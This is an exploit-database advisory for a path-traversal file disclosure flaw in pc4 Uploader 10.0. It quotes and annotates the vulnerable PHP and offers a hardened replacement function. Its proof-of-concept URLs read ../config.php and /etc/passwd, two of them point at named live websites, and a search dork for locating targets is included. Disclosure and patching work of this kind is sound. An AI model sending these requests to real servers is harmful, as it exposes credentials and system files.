ID 1337DAY-ID-5391
Type zdt
Reporter Qabandi
Modified 2009-06-22T00:00:00
Description
Exploit for unknown platform in category web applications
=========================================================
pc4 Uploader <= 10.0 Remote File Disclosure Vulnerability
=========================================================
=Vuln: pc4arb - pc4 Uploader <= 10.0 Remote File Disclosure Vulnerability
=INFO: http://pc4arb.com/article-48.html
=BUY: ~~~
=Download: ~~~
=DORK: intext:"Pictures of Whale Penis"
____________
_-=/:Conditions:\=-_
````````````````````````````````````````````````````````````````````````````````
none
---------------------------------------===--------------------------------------
_________________
_-=/:Vulnerable_Code:\=-_
````````````````````````````````````````````````````````````````````````````````
// in "./pc4uploader/upfiles/index.php"
// Vulnerable original, quoted from the product: sends response headers for $fn and
// then streams the file's bytes to the client.
//   $fn      - path to open; the caller shown further down passes $_GET['file'] unchanged
//   $lastMod - value placed in the Last-Modified header
//   $fs      - value placed in Content-Length and used as the fread() length
// Nothing here restricts $fn to a directory or to a set of file types, so the caller's
// value alone decides which file is read.
function displayimage( $fn, $lastMod, $fs )
{
global $out_Types;
// The extension is whatever follows the last "." in $fn.
$ext = explode( ".", $fn );
$ext_i = count( $ext ) - 1;
$file_ext = $ext[$ext_i];
// All headers are emitted before the file is opened, so they go out even if fopen() fails.
header( "Last-Modified: ".$lastMod );
header( "ETag: ".getetag( $fn ) );
header( "Accept-Ranges: bytes" );
header( "Content-Length: ".$fs );
// No check that $file_ext is a key of $out_Types: an unknown extension gives an empty
// Content-Type, and the file is sent regardless.
header( "Content-Type: ".$out_Types[$file_ext] );
// Root cause: relative ("../config.php") and absolute ("/etc/passwd") paths are both
// accepted as given. The return value of fopen() is not checked either.
$fp = fopen( $fn, "rb" ); <-----------------------------//opens $fn with no filtering or precautions taken
// NOTE(review): fpassthru is written as a bare identifier, not the string 'fpassthru'.
if ( function_exists( fpassthru ) )
{
fpassthru( $fp );
}
else
{
// Fallback path: read $fs bytes and echo them.
$temp = fread( $fp, $fs );
echo $temp;
}
fclose( $fp );
return;
}
// Function displayimage() is later called
// The request parameter is copied as-is: no type check, no basename(), no extension allow-list.
$file = $_GET['file']; <---------------------------------// again, not filtered or anything.
//..
//..
//..
//..
// $fs is presumably assigned in the elided lines above; how it is derived is not shown.
// The untrusted $file value reaches fopen() inside displayimage() unchanged.
displayimage( $file, "Thu, 01 Jan 2006 12:00:00 GMT", $fs );
---------------------------------------===--------------------------------------
_______
_-=/:P.o.C:\=-_
````````````````````````````````````````````````````````````````````````````````
http://localhost/pc4uploader/upfiles/index.php?file=../config.php
http://localhost/pc4uploader/upfiles/index.php?file=/etc/passwd
demo:
http://upload.traidnt.net/upfiles/index.php?file=../config.php
{Save File to view the code if needed}
http://uploader.pc4arb.com/upfiles/index.php?file=../config.php
{view source}
---------------------------------------===--------------------------------------
__________
_-=/:SOLUTION:\=-_
````````````````````````````````````````````````````````````````````````````````
//Use this displayimage() function instead, notice the changes..
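/**
 * Stream one file from the upload directory to the client.
 *
 * Hardened form of the advisory's fix. basename() removes every directory
 * component, but on its own it still lets a request name any file that sits
 * in the same directory (index.php, dotfiles). The extension must therefore
 * also be a key of $out_Types, and the target must be an existing regular
 * file, before any header is sent.
 *
 * @param string $fn      Requested file name; treated as untrusted input.
 * @param string $lastMod Value sent in the Last-Modified header.
 * @param int    $fs      Length sent in Content-Length and used by the fread() fallback.
 * @return void
 */
function displayimage( $fn, $lastMod, $fs )
{
    global $out_Types;

    // An array-valued parameter (file[]=x) or an embedded NUL can never name a served file.
    $name = "";
    if ( is_string( $fn ) && strpos( $fn, "\0" ) === false )
    {
        // "../../config.php" and "/etc/passwd" collapse to their last path segment.
        $name = basename( $fn );
    }

    // The extension is the text after the last "." (the whole name when there is no dot).
    $parts = explode( ".", $name );
    $file_ext = $parts[count( $parts ) - 1];

    // $out_Types doubles as the allow-list: only extensions it maps to a MIME type are served.
    // The relative name is resolved against the current working directory, as before.
    if ( $name === "" || !isset( $out_Types[$file_ext] ) || !is_file( $name ) )
    {
        if ( !headers_sent() )
        {
            header( "HTTP/1.1 404 Not Found" );
        }
        return;
    }

    // Open before sending headers so a failed open does not produce a
    // success response with an empty body.
    $fp = fopen( $name, "rb" );
    if ( $fp === false )
    {
        if ( !headers_sent() )
        {
            header( "HTTP/1.1 404 Not Found" );
        }
        return;
    }

    header( "Last-Modified: ".$lastMod );
    header( "ETag: ".getetag( $name ) );
    header( "Accept-Ranges: bytes" );
    // NOTE(review): $fs comes from the caller; confirm it was computed for the
    // same file that is opened here, otherwise Content-Length will not match.
    header( "Content-Length: ".$fs );
    header( "Content-Type: ".$out_Types[$file_ext] );

    // function_exists() takes the name as a string; the bare identifier in the
    // original is an undefined constant.
    if ( function_exists( "fpassthru" ) )
    {
        fpassthru( $fp );
    }
    elseif ( $fs > 0 )
    {
        // fread() needs a positive length.
        echo fread( $fp, $fs );
    }
    fclose( $fp );
    return;
}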
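//I added $fn = basename($fn); it strips every directory component, so anything like "../../config.php" becomes "config.php"
// since config.php doesn't exist in ./upfiles/, fopen() fails and the script will do the rest by giving a safe error,
// also move ./include/default.gif to ./upfiles/default.gif
// everything should be good :)
// Caveat: basename() only confines the read to the directory the relative name resolves in (./upfiles/).
// Any file stored there, index.php included, can still be requested by name, so the extension
// should also be checked against the allowed types before the file is opened.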
{"published": "2009-06-22T00:00:00", "id": "1337DAY-ID-5391", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "enchantments": {"score": {"value": 1.0, "vector": "NONE", "modified": "2018-03-19T05:24:28", "rev": 2}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562311220191505", "OPENVAS:1361412562311220191512"]}, {"type": "nessus", "idList": ["EULEROS_SA-2019-1512.NASL", "SUSE_SU-2019-0672-1.NASL", "REDHAT-RHSA-2018-3586.NASL", "REDHAT-RHSA-2018-3590.NASL", "REDHAT-RHSA-2018-3459.NASL", "VIRTUOZZO_VZA-2018-075.NASL", "REDHAT-RHSA-2018-3540.NASL", "HP_IMC_DBMAN_MULTI_VULNS_HPESBHF03930.NASL", "EULEROS_SA-2019-1505.NASL", "SUSE_SU-2019-0645-1.NASL"]}, {"type": "redhat", "idList": ["RHSA-2018:3459", "RHSA-2018:3586", "RHSA-2018:3590", "RHSA-2018:3540", "RHSA-2018:2925"]}], "modified": "2018-03-19T05:24:28", "rev": 2}, "vulnersScore": 1.0}, "type": "zdt", "lastseen": "2018-03-19T05:24:28", "edition": 2, "title": "pc4 Uploader <= 10.0 Remote File Disclosure Vulnerability", "href": "https://0day.today/exploit/description/5391", "modified": "2009-06-22T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/5391", "references": [], "reporter": "Qabandi", "sourceData": "=========================================================\r\npc4 Uploader <= 10.0 Remote File Disclosure Vulnerability\r\n=========================================================\r\n\r\n\r\n=Vuln:\t\tpc4arb - pc4 Uploader <= 10.0 Remote File Disclosure Vulnerability\r\n=INFO:\t\thttp://pc4arb.com/article-48.html\r\n=BUY: \t\t~~~\r\n=Download: ~~~\r\n=DORK:\t\tintext:\"Pictures of Whale Penis\"\r\n\r\n ____________\r\n _-=/:Conditions:\\=-_\r\n````````````````````````````````````````````````````````````````````````````````\r\n\r\nnone\r\n\r\n---------------------------------------===--------------------------------------\r\n\r\n _________________\r\n 
_-=/:Vulnerable_Code:\\=-_\r\n````````````````````````````````````````````````````````````````````````````````\r\n// in \"./pc4uploader/upfiles/index.php\"\r\n\r\nfunction displayimage( $fn, $lastMod, $fs )\r\n{\r\n global $out_Types;\r\n $ext = explode( \".\", $fn );\r\n $ext_i = count( $ext ) - 1;\r\n $file_ext = $ext[$ext_i];\r\n header( \"Last-Modified: \".$lastMod );\r\n header( \"ETag: \".getetag( $fn ) );\r\n header( \"Accept-Ranges: bytes\" );\r\n header( \"Content-Length: \".$fs );\r\n header( \"Content-Type: \".$out_Types[$file_ext] );\r\n $fp = fopen( $fn, \"rb\" ); <-----------------------------//opens $fn with no filtering or precautions taken\r\n if ( function_exists( fpassthru ) )\r\n {\r\n fpassthru( $fp );\r\n }\r\n else\r\n {\r\n $temp = fread( $fp, $fs );\r\n echo $temp;\r\n }\r\n fclose( $fp );\r\n return;\r\n}\r\n\r\n// Function displayimage() is later called\r\n\r\n$file = $_GET['file']; <---------------------------------// again, not filtered or anything.\r\n//..\r\n//..\r\n//..\r\n//..\r\n displayimage( $file, \"Thu, 01 Jan 2006 12:00:00 GMT\", $fs );\r\n\r\n---------------------------------------===--------------------------------------\r\n\r\n _______\r\n _-=/:P.o.C:\\=-_\r\n````````````````````````````````````````````````````````````````````````````````\r\n\r\nhttp://localhost/pc4uploader/upfiles/index.php?file=../config.php\r\nhttp://localhost/pc4uploader/upfiles/index.php?file=/etc/passwd\r\n\r\ndemo:\r\n\r\nhttp://upload.traidnt.net/upfiles/index.php?file=../config.php\r\n{Save File to view the code if needed}\r\n\r\nhttp://uploader.pc4arb.com/upfiles/index.php?file=../config.php\r\n{view source}\r\n\r\n\r\n\r\n---------------------------------------===--------------------------------------\r\n\r\n __________\r\n _-=/:SOLUTION:\\=-_\r\n````````````````````````````````````````````````````````````````````````````````\r\n\r\n//Use this displayimage() function instead, notice the changes..\r\n\r\nfunction displayimage( $fn, $lastMod, $fs 
)\r\n{\r\n global $out_Types;\r\n $fn = basename($fn); \r\n $ext = explode( \".\", $fn );\r\n $ext_i = count( $ext ) - 1;\r\n $file_ext = $ext[$ext_i];\r\n header( \"Last-Modified: \".$lastMod );\r\n header( \"ETag: \".getetag( $fn ) );\r\n header( \"Accept-Ranges: bytes\" );\r\n header( \"Content-Length: \".$fs );\r\n header( \"Content-Type: \".$out_Types[$file_ext] );\r\n $fp = fopen( $fn, \"rb\" );\r\n if ( function_exists( fpassthru ) )\r\n {\r\n fpassthru( $fp );\r\n }\r\n else\r\n {\r\n $temp = fread( $fp, $fs );\r\n echo $temp;\r\n }\r\n fclose( $fp );\r\n return;\r\n}\r\n\r\n//I added $fn = basename($fn);, it will convert anything like \"../../config.php\" to \"config.php\"\r\n// since config.php doesent exist the script will do the rest by giving a safe error,\r\n// also move ./include/default.gif to ./upfiles/default.gif\r\n// everything should be good :)\r\n\r\n\r\n\r\n\n# 0day.today [2018-03-19] #"}
{}